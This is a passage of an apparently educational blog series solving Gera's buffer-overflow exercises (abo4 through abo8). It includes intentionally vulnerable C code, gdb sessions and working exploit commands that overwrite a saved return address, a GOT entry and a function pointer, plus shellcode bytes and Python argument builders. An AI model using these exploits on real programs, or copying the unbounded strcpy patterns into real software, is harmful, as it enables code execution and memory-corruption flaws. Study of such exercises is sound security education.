Insecure Programming by Example: abo6/7/8 Ménage à trois

This post will be pretty brief: the solution for abo6.c does not differ significantly from previously covered exercises, and abo7.c and abo8.c are both not exploitable. The latter two exercises demonstrate an important concept, namely where variables end up in memory depending on how they are defined in C. I’ll outline it, but it won’t take long.

abo6.c

/* abo6.c                                       *
 * specially crafted to feed your brain by gera */

/* wwwhat'u talkin' about? */

int main(int argv,char **argc) {
    char *pbuf=malloc(strlen(argc[2])+1);
    char buf[256];

    strcpy(buf,argc[1]);
    strcpy(pbuf,argc[2]);
    while(1);
}

This code is pretty much the same as the last exercise, with one important difference: instead of a call to exit(), the code ends in a while loop that never terminates. In the disassembly, this looks like the following:

0x08048428 <main+68>:   call   0x80482f8 <strcpy@plt>
0x0804842d <main+73>:   mov    eax,DWORD PTR [ebp+12]
0x08048430 <main+76>:   add    eax,0x8
0x08048433 <main+79>:   mov    eax,DWORD PTR [eax]
0x08048435 <main+81>:   mov    DWORD PTR [esp+4],eax
0x08048439 <main+85>:   mov    eax,DWORD PTR [ebp-12]
0x0804843c <main+88>:   mov    DWORD PTR [esp],eax
0x0804843f <main+91>:   call   0x80482f8 <strcpy@plt>
0x08048444 <main+96>:   jmp    0x8048444 <main+96>

So basically, it’s an unconditional jump that targets itself, and therefore it never ends. Since no library function such as exit is called after the second strcpy, overwriting an entry in the GOT gains us nothing, because nothing would ever jump through it. However, where there is a will there is a way, and we must keep in mind that we can still write arbitrarily to memory so long as permissions allow. The solution in this case is nothing revolutionary: we’ll directly overwrite the saved return address of the second strcpy’s stack frame, so that strcpy itself returns to an address of our choosing. This is an important reminder by Gera that being able to write a value into memory is a tool with many applications, some of which I’m sure I’m not even aware of at this point.

The one tricky part of this solution: don’t try to locate the saved return address of the second strcpy stack frame until you are passing arguments of exactly the same size as the ones you will use for the overwrite, because the location of the saved EIP for that frame shifts with the length of the command line arguments. In the debugger, here is what the solution looks like.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./abo6
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disassemble main
Dump of assembler code for function main:
0x080483e4 <main+0>:    push   ebp
0x080483e5 <main+1>:    mov    ebp,esp
0x080483e7 <main+3>:    sub    esp,0x128
0x080483ed <main+9>:    and    esp,0xfffffff0
0x080483f0 <main+12>:   mov    eax,0x0
0x080483f5 <main+17>:   sub    esp,eax
0x080483f7 <main+19>:   mov    eax,DWORD PTR [ebp+12]
0x080483fa <main+22>:   add    eax,0x8
0x080483fd <main+25>:   mov    eax,DWORD PTR [eax]
0x080483ff <main+27>:   mov    DWORD PTR [esp],eax
0x08048402 <main+30>:   call   0x80482e8 <strlen@plt>
0x08048407 <main+35>:   inc    eax
0x08048408 <main+36>:   mov    DWORD PTR [esp],eax
0x0804840b <main+39>:   call   0x8048308 <malloc@plt>
0x08048410 <main+44>:   mov    DWORD PTR [ebp-12],eax
0x08048413 <main+47>:   mov    eax,DWORD PTR [ebp+12]
0x08048416 <main+50>:   add    eax,0x4
0x08048419 <main+53>:   mov    eax,DWORD PTR [eax]
0x0804841b <main+55>:   mov    DWORD PTR [esp+4],eax
0x0804841f <main+59>:   lea    eax,[ebp-0x118]
0x08048425 <main+65>:   mov    DWORD PTR [esp],eax
0x08048428 <main+68>:   call   0x80482f8 <strcpy@plt>
0x0804842d <main+73>:   mov    eax,DWORD PTR [ebp+12]
0x08048430 <main+76>:   add    eax,0x8
0x08048433 <main+79>:   mov    eax,DWORD PTR [eax]
0x08048435 <main+81>:   mov    DWORD PTR [esp+4],eax
0x08048439 <main+85>:   mov    eax,DWORD PTR [ebp-12]
0x0804843c <main+88>:   mov    DWORD PTR [esp],eax
0x0804843f <main+91>:   call   0x80482f8 <strcpy@plt>
---Type <return> to continue, or q <return> to quit---
0x08048444 <main+96>:   jmp    0x8048444 <main+96>
End of assembler dump.
(gdb) break *0x0804843f
Breakpoint 1 at 0x804843f: file abo6.c, line 11.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo6 one two

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff874) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) x buf
0xbffff6d0:     0x00656e6f
(gdb) x &pbuf
0xbffff7dc:     0x0804a008
(gdb) print/d 0xbffff7dc - 0xbffff6d0
$1 = 268
(gdb) run $(perl -e 'print "A" x 268 . "BBBB";') CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/hacking/InsecureProgramming/abo6 $(perl -e 'print "A" x 268 . "BBBB";') CCCC

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff764) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) stepi
0x080482f8 in strcpy@plt ()
(gdb) where
#0  0x080482f8 in strcpy@plt ()
#1  0x08048444 in main (argv=3, argc=0xbffff764) at abo6.c:11
(gdb) info frame 0
Stack frame at 0xbffff5b0:
 eip = 0x80482f8 in strcpy@plt; saved eip 0x8048444
 called by frame at 0xbffff6e0
 Arglist at 0xbffff5a8, args:
 Locals at 0xbffff5a8, Previous frame's sp is 0xbffff5b0
 Saved registers:
  eip at 0xbffff5ac
(gdb) run $(perl -e 'print "A" x 268 . "\xac\xf5\xff\xbf";') BBBB
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/hacking/InsecureProgramming/abo6 $(perl -e 'print "A" x 268 . "\xac\xf5\xff\xbf";') BBBB

Breakpoint 1, 0x0804843f in main (argv=3, argc=0xbffff764) at abo6.c:11
11              strcpy(pbuf,argc[2]);
(gdb) next

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
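
The session above only works because the probe run and the final run pass arguments of identical length. Here is a minimal Python sketch of that bookkeeping. The helper name build_args is made up for illustration, and the addresses are the ones gdb reported on this particular system, so they will differ elsewhere.

```python
import struct

PAD_LEN = 268              # distance from buf to pbuf (print/d result above)
SAVED_EIP = 0xbffff5ac     # "eip at" from info frame 0; system specific

def build_args(pbuf_value: bytes, written_value: bytes):
    """Return (arg1, arg2): arg1 overflows buf into pbuf, arg2 is copied to *pbuf."""
    return b"A" * PAD_LEN + pbuf_value, written_value

# Probe run: same sizes as the real thing, harmless contents.
probe = build_args(b"BBBB", b"CCCC")
# Real run: pbuf now points at strcpy's saved return address.
final = build_args(struct.pack("<I", SAVED_EIP), b"BBBB")

# Equal lengths keep the stack layout, and so the saved EIP address, unchanged.
assert [len(a) for a in probe] == [len(a) for a in final]
print(final[0][-4:].hex())
```

The last four bytes of the first argument come out in little-endian order, matching the "\xac\xf5\xff\xbf" passed to perl above.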

abo7.c and abo8.c

These two exercises, as mentioned previously, are unexploitable. They highlight where variables are placed in memory depending on how they are declared in C.

abo7.c

/* abo7.c                                       *
 * specially crafted to feed your brain by gera */

/* sometimes you can,       *
 * sometimes you don't      *
 * that's what life's about */

char buf[256]={1};

int main(int argv,char **argc) {
    strcpy(buf,argc[1]);
}

Here you have an initialized global variable in the form of buf. Using the versatile objdump command, you can see pretty easily that while this is a legitimate buffer overflow (strcpy does no bounds checking), the location of this variable precludes using it to take control of the program.

hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo7 | grep buf
080495a0 g     O .data  00000100              buf
hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo7

abo7:     file format elf32-i386
abo7
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x080482b0
<...snip>
 10 .plt          00000040  08048270  08048270  00000270  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001a0  080482b0  080482b0  000002b0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  08048450  08048450  00000450  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       00000008  0804846c  0804846c  0000046c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  08048474  08048474  00000474  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  08049478  08049478  00000478  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        00000008  08049480  08049480  00000480  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  08049488  08049488  00000488  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  0804948c  0804948c  0000048c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049554  08049554  00000554  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      00000018  08049558  08049558  00000558  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         00000120  08049580  08049580  00000580  2**5
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000004  080496a0  080496a0  000006a0  2**2
                  ALLOC

080495a0 g     O .data  00000100              buf
080496a0 g       *ABS*  00000000              _edata
08048419 g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
08048374 g     F .text  0000002a              main
08048258 g     F .init  00000000              _init

abo8.c

Gera says: Don’t stay static

/* abo8.c                                       *
 * specially crafted to feed your brain by gera */

/* spot the difference */

char buf[256];

int main(int argv,char **argc) {
	strcpy(buf,argc[1]);
}

Gera continues: From the top of your head, what do you think is generally more safe, a program dynamically linked to its libraries or one statically linked to them? Now go and try it out!

In this next example, very similar restrictions apply, with Gera challenging you to spot the difference between the two. Since buf in this case is uninitialized, it is stored in the .bss section of the ELF executable.

hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo8 | grep buf
080495a0 g     O .bss   00000100              buf
hacking@hacking-theart:~/InsecureProgramming $ objdump -x abo8

abo8:     file format elf32-i386
abo8
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x080482b0
<...snip...>
 10 .plt          00000040  08048270  08048270  00000270  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001a0  080482b0  080482b0  000002b0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  08048450  08048450  00000450  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       00000008  0804846c  0804846c  0000046c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  08048474  08048474  00000474  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  08049478  08049478  00000478  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        00000008  08049480  08049480  00000480  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  08049488  08049488  00000488  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  0804948c  0804948c  0000048c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049554  08049554  00000554  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      00000018  08049558  08049558  00000558  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         0000000c  08049570  08049570  00000570  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000120  08049580  08049580  0000057c  2**5
                  ALLOC
 23 .comment      0000012f  00000000  00000000  0000057c  2**0
                  CONTENTS, READONLY
<...snip...>
080495a0 g     O .bss   00000100              buf
0804957c g       *ABS*  00000000              _edata
08048419 g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
08048374 g     F .text  0000002a              main
08048258 g     F .init  00000000              _init
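
To see why neither overflow reaches anything interesting, it helps to do the address arithmetic on the two objdump listings above. The sketch below is only that arithmetic, written in Python. The section addresses and sizes are copied from the output above, and the helper sections_reachable is a name invented here.

```python
# (start address, size) pairs copied from the objdump -x output above
ABO7 = {".dtors": (0x08049480, 0x08), ".got": (0x08049554, 0x04),
        ".got.plt": (0x08049558, 0x18), ".data": (0x08049580, 0x120),
        ".bss": (0x080496a0, 0x04)}
ABO8 = {".dtors": (0x08049480, 0x08), ".got": (0x08049554, 0x04),
        ".got.plt": (0x08049558, 0x18), ".data": (0x08049570, 0x0c),
        ".bss": (0x08049580, 0x120)}
BUF_START, BUF_SIZE = 0x080495a0, 0x100   # same symbol address in both binaries

def sections_reachable(sections):
    """Names of sections that start at or after the end of buf.

    strcpy only writes upward from buf, so these are the only listed
    sections a linear overflow can touch.
    """
    buf_end = BUF_START + BUF_SIZE
    return sorted(name for name, (start, _size) in sections.items()
                  if start >= buf_end)

print(sections_reachable(ABO7))
print(sections_reachable(ABO8))
```

In abo7 only the 4-byte .bss follows buf, and in abo8 buf is the last object in .bss. In both binaries .dtors and the GOT sit at lower addresses, out of reach of a forward copy.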

I’m a little disconcerted that I’m not sure what Gera was driving at with his hints in this one. I’ve been over and over it, and I’m pretty sure the compilation options don’t matter. If you were to compile this as a statically linked executable, you’d still have almost nothing to work with to control execution, because buf still lives in a memory region where a buffer overflow is pretty much useless. I’m sure there is some point, but I don’t see it. It may be that with an older compiler on an older distribution this example had some useful lessons to teach; certainly the point about .data versus .bss is well taken. In a previous exercise, I alluded to a paper by Juan M. Bello Rivas (see Books & Pubs for more) on overwriting .dtors 0xFFFFFFFF values to redirect execution, which I think would also have some possibilities for these examples, but I don’t have an old enough system to test on.

For the last word on this particular issue (and the general usefulness of control of variables in these sections) I’d like to provide an excerpt from the book The Art of Software Security Assessment by Mark Dowd, John McDonald, and Justin Schuh. This book is a nice resource to have; if you don’t already own it, I’d recommend you purchase a copy and keep it on the shelf, using it as a pre-Google resource or jumping-off point.

Global and Static Data Overflows

Global and static variables are used to store data that persists between different function calls, so they are generally stored in a different memory segment than stack and heap variables are. Normally, these locations don’t contain general program runtime data structures, such as stack activation records and heap chunk data, so exploiting an overflow in this segment requires application-specific attacks similar to the vulnerability in Listing 5-2. Exploitability depends on what variables can be corrupted when the buffer overflow occurs and how the variables are used. For example, if pointer variables can be corrupted, the likelihood of exploitation increases, as this corruption introduces the possibility for arbitrary memory overwrites.

Listing 5-2

Off-by-One Length Miscalculation

int authenticate(char *username, char *password)
{
    int authenticated;
    char buffer[1024];

    authenticated = verify_password(username, password);

    if(authenticated == 0)
    {
        sprintf(buffer, "password is incorrect for user %s\n", username);
        log("%s", buffer);
    }

    return authenticated;
}

Next up, we screw with malloc and make it do what we want, trying to learn something about its implementation to boot.


Insecure Programming by Example: abo5.c we GOT this…

Introduction

I actually solved this one a bit ago, while messing around at the GFIRST 2010 conference in San Antonio. Just now getting around to writing it up.

Here is the code for abo5.c:

Gera says: ch-ch-ch-changes

/* abo5.c                                                  *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* You take the blue pill, you wake up in your bed,    *
 *     and you believe what you want to believe        *
 * You take the red pill,                              *
 *     and I'll show you how deep goes the rabbit hole */

int main(int argv,char **argc) {
	char *pbuf=malloc(strlen(argc[2])+1);
	char buf[256];

	strcpy(buf,argc[1]);
	for (;*pbuf++=*(argc[2]++););
	exit(1);
}

Use your sixth sense, will you be able to gain control given the possibility of writing wherever you wish in memory?

As you can see, this is very similar code to the abo4.c exercise. Gera’s words are the keys to this exercise…as is often the case he’s given us a clue. We know very well from our previous trials and tribulations with abo4.c that by overflowing the pointer address of pbuf on the stack, we can essentially control 4-bytes of data at an arbitrary writeable location in the memory of the running process. This ends up being the key to successful exploitation of this code snippet.

Disassembly

Let’s take a look at the disassembled code. The important bits are the call to strcpy at main+68 and the call to exit at main+109.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 <main+0>:    push   ebp
0x08048415 <main+1>:    mov    ebp,esp
0x08048417 <main+3>:    sub    esp,0x128
0x0804841d <main+9>:    and    esp,0xfffffff0
0x08048420 <main+12>:   mov    eax,0x0
0x08048425 <main+17>:   sub    esp,eax
0x08048427 <main+19>:   mov    eax,DWORD PTR [ebp+12]
0x0804842a <main+22>:   add    eax,0x8
0x0804842d <main+25>:   mov    eax,DWORD PTR [eax]
0x0804842f <main+27>:   mov    DWORD PTR [esp],eax
0x08048432 <main+30>:   call   0x804830c <strlen@plt>
0x08048437 <main+35>:   inc    eax
0x08048438 <main+36>:   mov    DWORD PTR [esp],eax
0x0804843b <main+39>:   call   0x804832c <malloc@plt>
0x08048440 <main+44>:   mov    DWORD PTR [ebp-12],eax
0x08048443 <main+47>:   mov    eax,DWORD PTR [ebp+12]
0x08048446 <main+50>:   add    eax,0x4
0x08048449 <main+53>:   mov    eax,DWORD PTR [eax]
0x0804844b <main+55>:   mov    DWORD PTR [esp+4],eax
0x0804844f <main+59>:   lea    eax,[ebp-0x118]
0x08048455 <main+65>:   mov    DWORD PTR [esp],eax
0x08048458 <main+68>:   call   0x804831c <strcpy@plt>
0x0804845d <main+73>:   mov    eax,DWORD PTR [ebp-12]
0x08048460 <main+76>:   mov    ecx,eax
0x08048462 <main+78>:   mov    eax,DWORD PTR [ebp+12]
0x08048465 <main+81>:   add    eax,0x8
0x08048468 <main+84>:   mov    edx,DWORD PTR [eax]
0x0804846a <main+86>:   movzx  edx,BYTE PTR [edx]
0x0804846d <main+89>:   inc    DWORD PTR [eax]
0x0804846f <main+91>:   mov    BYTE PTR [ecx],dl
0x08048471 <main+93>:   lea    eax,[ebp-12]
0x08048474 <main+96>:   inc    DWORD PTR [eax]
0x08048476 <main+98>:   test   dl,dl
0x08048478 <main+100>:  jne    0x804845d <main+73>
0x0804847a <main+102>:  mov    DWORD PTR [esp],0x1
0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.

The first line of interest (main+68) is the call to strcpy that copies the first command line argument into buf and, being unbounded, lets us overwrite the pointer pbuf that sits above it on the stack. The code between that call and main+109 is the implementation of the for loop that copies the second command line argument to wherever pbuf points, and main+109 itself is the call to exit. As you can see in the disassembly and when reviewing the source, this code is slightly different from the previous pointer-overwrite exercise, in that there is no call through a function pointer afterward, so we can’t control execution in that manner. We could do a saved return address overwrite, since we essentially have control over a single DWORD in writeable memory (the stack being a writeable memory location, of course), but unfortunately there is a pesky call to exit, so main never returns and that method is out.

Actually if you’ve taken a look, you’ve realized that pretty much the only thing that happens after we overwrite the pointer value is a call to exit. Hmm…how can we use this to our advantage? Well first, you’ll note that the call to the exit routine is actually not as clear cut as it seems. It’s actually a call to a pointer in memory…perhaps we can control this call location?

Dynamic Linking

The reason that this call is exploitable is that the program is dynamically linked. The gist of dynamic linking is that a program can be compiled with references to external functions (functions that are declared in a header such as stdio.h and implemented in a separately compiled library, printf for instance) which are resolved at load time or run time; for that reason you may sometimes hear it referred to as run time linking. Linking and loading are beyond the scope of this article, and indeed my knowledge. This is what .dll files on Windows are for, and .so files on Linux and UNIX. Essentially, they contain functions that might be useful to have on the system, or functions that the C or C++ standards specify must be available, and they allow those functions to be shared among many programs without compiling them directly into each one.

This provides a few advantages. Off the top of my head, the most obvious ones are that you can fix a bug in a commonly used function once and have the fix propagate to all the code that uses it, and that you reduce the compiled size and complexity of a given code base. Every operating system that uses dynamic linking has some sort of lookup table that allows programs to resolve run time linked functions. On Linux and UNIX this lookup table is called the GOT, or Global Offset Table, and it works in close conjunction with another structure called the Procedure Linkage Table, or PLT.
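
As a rough mental model of that lookup table, every call to an imported function goes through a writable table slot that is read at call time. This is only a model: the dict named got, the plt_call helper and the two stand-in functions are invented here, and none of it reflects how the real loader is implemented.

```python
def real_exit(status):
    """Stand-in for the library's exit()."""
    return "exit(%d)" % status

def attacker_code(status):
    """Stand-in for whatever we would rather run instead."""
    return "you win!"

# Writable table: one slot per imported function, filled in at load/run time.
got = {"exit": real_exit}

def plt_call(name, *args):
    """Stand-in for a PLT stub: jump to whatever the table slot holds right now."""
    return got[name](*args)

print(plt_call("exit", 1))     # normal behaviour
got["exit"] = attacker_code    # a single pointer-sized write into the table
print(plt_call("exit", 1))     # same call site, different destination
```

The call site never changes. Only the table entry does, which is why a single well-placed write is enough.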

Taking a Look Under the Hood

There is a lot of documentation describing the structure and implementation of the GOT and PLT on Linux machines, and I’ve included some that I’ve found useful at the end of this post. In this case, I think I’d rather just take a look at the assembly and let that point us in the right direction. Honestly, so long as you understand that you can write an arbitrary 4-byte value anywhere you want (anywhere that is writeable and won’t produce a segfault), you can reason out what to do here without knowing much, or anything at all, about the GOT or PLT.

Let’s step through the call to exit and see what we find.

0x08048481 <main+109>:  call   0x804833c <exit@plt>
End of assembler dump.
(gdb) x/i 0x804833c
0x804833c <exit@plt>:   jmp    DWORD PTR ds:0x8049668
(gdb) x/xw 0x8049668
0x8049668 <_GLOBAL_OFFSET_TABLE_+32>:   0x08048342

First we’ve got the call to 0x804833c, which is the location of exit in the aforementioned PLT. Examining the instruction at that address shows an unconditional jump to the address stored in a pointer. This pointer, as you can see from the final command we ran, lives in the GOT at 0x8049668 and contains the value 0x08048342. If we overwrite that value with the address of some shellcode, we’ll have control of execution as soon as exit is called. Here is what that would look like.

First we’ll determine the distance between the address of buf and pbuf on the stack.

(gdb) break 1
Breakpoint 2 at 0x8048414: file abo5.c, line 1.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo5 one two

Breakpoint 2, main (argv=134513684, argc=0x3) at abo5.c:9
9       int main(int argv,char **argc) {
(gdb) x/x &buf
0xbffff730:     0x0804819c
(gdb) x/x &pbuf
0xbffff83c:     0xb8000ff4
(gdb) print/d 0xbffff83c - 0xbffff730
$4 = 268
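
The same number falls out of the disassembly without running anything, which makes a handy cross-check. Here is a small Python sketch using the two frame offsets visible in the listing earlier (lea eax,[ebp-0x118] for buf and [ebp-12] for pbuf). The variable names are mine.

```python
BUF_OFFSET = 0x118    # buf starts at ebp-0x118 (lea eax,[ebp-0x118])
PBUF_OFFSET = 12      # pbuf lives at ebp-12 (mov DWORD PTR [ebp-12],eax)

# Bytes to write, starting at buf, before the first byte of pbuf is reached.
distance_static = BUF_OFFSET - PBUF_OFFSET

# The same distance measured from the addresses gdb printed above.
distance_runtime = 0xbffff83c - 0xbffff730

assert distance_static == distance_runtime
print(distance_static)
```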

Then we’ll do our at-this-point-very-common magic with the shellcode we’ve been using all along, the address on the GOT for exit, the getenvaddr.c code that was generously provided by Hacking: The Art of Exploitation, and all the rest.

hacking@hacking-theart:~/InsecureProgramming $ hexdump -C print_youwin_shellcode
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 0a cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21 0a 0d                                       |n!..|
00000024
hacking@hacking-theart:~/InsecureProgramming $ export SHELLCODE=$(cat print_youwin_shellcode)
hacking@hacking-theart:~/InsecureProgramming $ echo $SHELLCODE
?Y1??1?C1? ??K??????you win!
hacking@hacking-theart:~/InsecureProgramming $ ./getenvaddr SHELLCODE ./abo5
SHELLCODE will be at 0xbffff9ec
hacking@hacking-theart:~/InsecureProgramming $ ./abo5 $(perl -e 'print "A" x 268 . "\x68\x96\x04\x08";') $(perl -e 'print "\xec\xf9\xff\xbf";')
you win!
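
For anyone who would rather not write the byte strings by hand, the two perl one-liners can be reproduced in Python. This is a sketch under the assumptions of the session above: 0x08049668 is the GOT slot for exit in this build and 0xbffff9ec is where getenvaddr reported SHELLCODE. Both values are specific to this machine, and le32 is a helper name made up here.

```python
import struct

EXIT_GOT = 0x08049668        # GOT slot read by exit@plt (from x/i above)
SHELLCODE_ADDR = 0xbffff9ec  # reported by ./getenvaddr SHELLCODE ./abo5

def le32(value):
    """Pack a 32-bit address in x86 little-endian byte order."""
    return struct.pack("<I", value)

arg1 = b"A" * 268 + le32(EXIT_GOT)   # fills buf, then replaces pbuf
arg2 = le32(SHELLCODE_ADDR)          # the for loop copies this to *pbuf

# Neither argument may contain a NUL byte, or it would be cut short
# before the program ever copies it.
assert b"\x00" not in arg1 and b"\x00" not in arg2
print(arg1[-4:].hex(), arg2.hex())
```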

There we go, that’s all for now :-).

References

I didn’t really use these references to develop this post, but in perusing them I thought they’d be useful for someone wanting a bit more in-depth explanation of some of the concepts in here.

Executable and Linking Format (ELF) by unknown author, Tool Interface Standards, Portable Formats Specification, Ver 1.1
Dynamic Linking in Linux and Windows by Reji Thomas and Bhasker Reddy, Symantec
Understanding Memory by University of Alberta AICT Research and Support

Insecure Programming by Example: abo4.c POINTER MADNESS

Introduction

I love sensational titles.

Here is abo4.c:

/* abo4.c                                                    *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* After this one, the next is just an Eureka! away          */

extern system,puts;
void (*fn)(char*)=(void(*)(char*))&system;

int main(int argv,char **argc) {
	char *pbuf=malloc(strlen(argc[2])+1);
	char buf[256];

	fn=(void(*)(char*))&puts;
	strcpy(buf,argc[1]);
	strcpy(pbuf,argc[2]);
	fn(argc[3]);
	while(1);
}

Gera says:

oh pointers, pointers!
Do you remember when you had problems with * and &? everybody has that kind of problems at least once when learning C, what about pointers to pointers? let’s see…

There are a few elements of this that we should go over before we review the disassembly itself. Reviewing the disassembly will of course prove to be the most fruitful way to attack most problems like this, but it seems to me there’s a lot of C here that we haven’t seen before.

First, let’s address the use of the extern keyword. From what I can tell, system and puts are declared extern so that we can apply the unary address-of operator to functions that would otherwise come from the header files stdio.h (puts) and stdlib.h (system), without including those headers. I’d love to be corrected, I’m no C ninja, but other than that I can’t see the point of it. Some documentation on extern is available here, if you want to peruse it on your own…this is what led me to this conclusion.

Now for the life of me, I can’t figure out what the heck he’s doing on the next line, where the function pointer fn is initialized with the address of system. I should email him and ask, but I hear he’s a busy guy ;-). Maybe that one will come out in the comments as well. The pointer bits are important though, as we’ll see in a bit.

The last thing we should mention here is the use of malloc within main to allocate a buffer, as I think this is the first time it’s come up. Documentation on the usage of malloc can be found here. Essentially, this code declares a pointer to char (1 byte in size, for the purposes of pointer arithmetic) and points it at the block of memory returned by malloc. The size requested from malloc is the length of the second argument submitted to main plus one byte. The extra byte leaves room for strcpy to copy the NUL byte that terminates the string; without it, the copy would write one byte past the end of the allocated chunk.

In the Debugger

Now let’s take a look at the disassembly of the program itself once it’s compiled in GCC, using our favorite debugger GDB.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048444 <main+0>: push ebp
0x08048445 <main+1>: mov ebp,esp
0x08048447 <main+3>: sub esp,0x128
0x0804844d <main+9>: and esp,0xfffffff0
0x08048450 <main+12>: mov eax,0x0
0x08048455 <main+17>: sub esp,eax
0x08048457 <main+19>: mov eax,DWORD PTR [ebp+12]
0x0804845a <main+22>: add eax,0x8
0x0804845d <main+25>: mov eax,DWORD PTR [eax]
0x0804845f <main+27>: mov DWORD PTR [esp],eax
0x08048462 <main+30>: call 0x8048340 <strlen@plt>
0x08048467 <main+35>: inc eax
0x08048468 <main+36>: mov DWORD PTR [esp],eax
0x0804846b <main+39>: call 0x8048360 <malloc@plt>
0x08048470 <main+44>: mov DWORD PTR [ebp-12],eax
0x08048473 <main+47>: mov DWORD PTR ds:0x80496bc,0x8048370
0x0804847d <main+57>: mov eax,DWORD PTR [ebp+12]
0x08048480 <main+60>: add eax,0x4
0x08048483 <main+63>: mov eax,DWORD PTR [eax]
0x08048485 <main+65>: mov DWORD PTR [esp+4],eax
0x08048489 <main+69>: lea eax,[ebp-0x118]
0x0804848f <main+75>: mov DWORD PTR [esp],eax
0x08048492 <main+78>: call 0x8048350 <strcpy@plt>
0x08048497 <main+83>: mov eax,DWORD PTR [ebp+12]
0x0804849a <main+86>: add eax,0x8
0x0804849d <main+89>: mov eax,DWORD PTR [eax]
0x0804849f <main+91>: mov DWORD PTR [esp+4],eax
0x080484a3 <main+95>: mov eax,DWORD PTR [ebp-12]
0x080484a6 <main+98>: mov DWORD PTR [esp],eax
0x080484a9 <main+101>: call 0x8048350 <strcpy@plt>
0x080484ae <main+106>: mov eax,DWORD PTR [ebp+12]
0x080484b1 <main+109>: add eax,0xc
0x080484b4 <main+112>: mov eax,DWORD PTR [eax]
0x080484b6 <main+114>: mov DWORD PTR [esp],eax
0x080484b9 <main+117>: mov eax,ds:0x80496bc
0x080484be <main+122>: call eax
0x080484c0 <main+124>: jmp 0x80484c0 <main+124>
End of assembler dump.

I’ve taken the liberty of highlighting the function calls. It seems to me that any time you see a call eax your ears should prick up. This is the spot where we have to exploit the program, as right after that you have an unconditional jump to itself, the infinite loop at the end of the program which prevents us from overwriting the saved return address and exploiting upon exit from main.

What we have with this program is essentially two insecure functions, and then a call to a program-defined function which is a pointer stored at 0x80496bc…if we can somehow modify what address is here, we can control execution of the program and win.

Draw the Stack

Let’s take a look at the variables on the stack, which we can likely control with our wonderful unbounded strcpy call.

(gdb) x
0xbffff730: 0x080481b0
(gdb) x
0xbffff83c: 0xb8000ff4
(gdb) x
0x80496bc <fn>: 0x08048320
(gdb) print 0xbffff83c - 0xbffff730
$1 = 268

Your spider sense should be tingling here. Let’s ask ourselves what the program is doing. First, it uses an insecure function to copy an unbounded amount of data onto the stack, the same stack that holds the pointer another insecure function will then copy to. This fatal combination of (intentional and educational!) errors allows us to write any amount of data we want to an arbitrary writeable location in the program’s memory. We can use this to our advantage and overwrite the address stored in the fn function pointer, and essentially execute wherever we wish.
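
If the two-step nature of this is hard to picture, here is a toy replay of the two strcpy calls in Python. It is a sketch and not a real memory model: the stack is a bytearray, the rest of memory is a dict keyed by address, and writing to an unmapped address does not fault the way it would in a real process. FN_ADDR and PUTS_PLT are taken from the disassembly above, while HEAP_ADDR is a made-up value standing in for whatever malloc returns.

```python
import struct

BUF_OFF, PBUF_OFF = 0, 268   # pbuf sits 268 bytes above buf
FN_ADDR = 0x080496bc         # address of fn, from the disassembly
PUTS_PLT = 0x08048370        # value main stores in fn before the copies
HEAP_ADDR = 0x0804a008       # hypothetical malloc result, for illustration only

def run(arg1: bytes, arg2: bytes) -> int:
    """Replay abo4's two strcpy calls on a toy memory; return what fn holds."""
    stack = bytearray(288)                       # buf, padding, pbuf, spare room
    memory = {FN_ADDR: struct.pack("<I", PUTS_PLT)}
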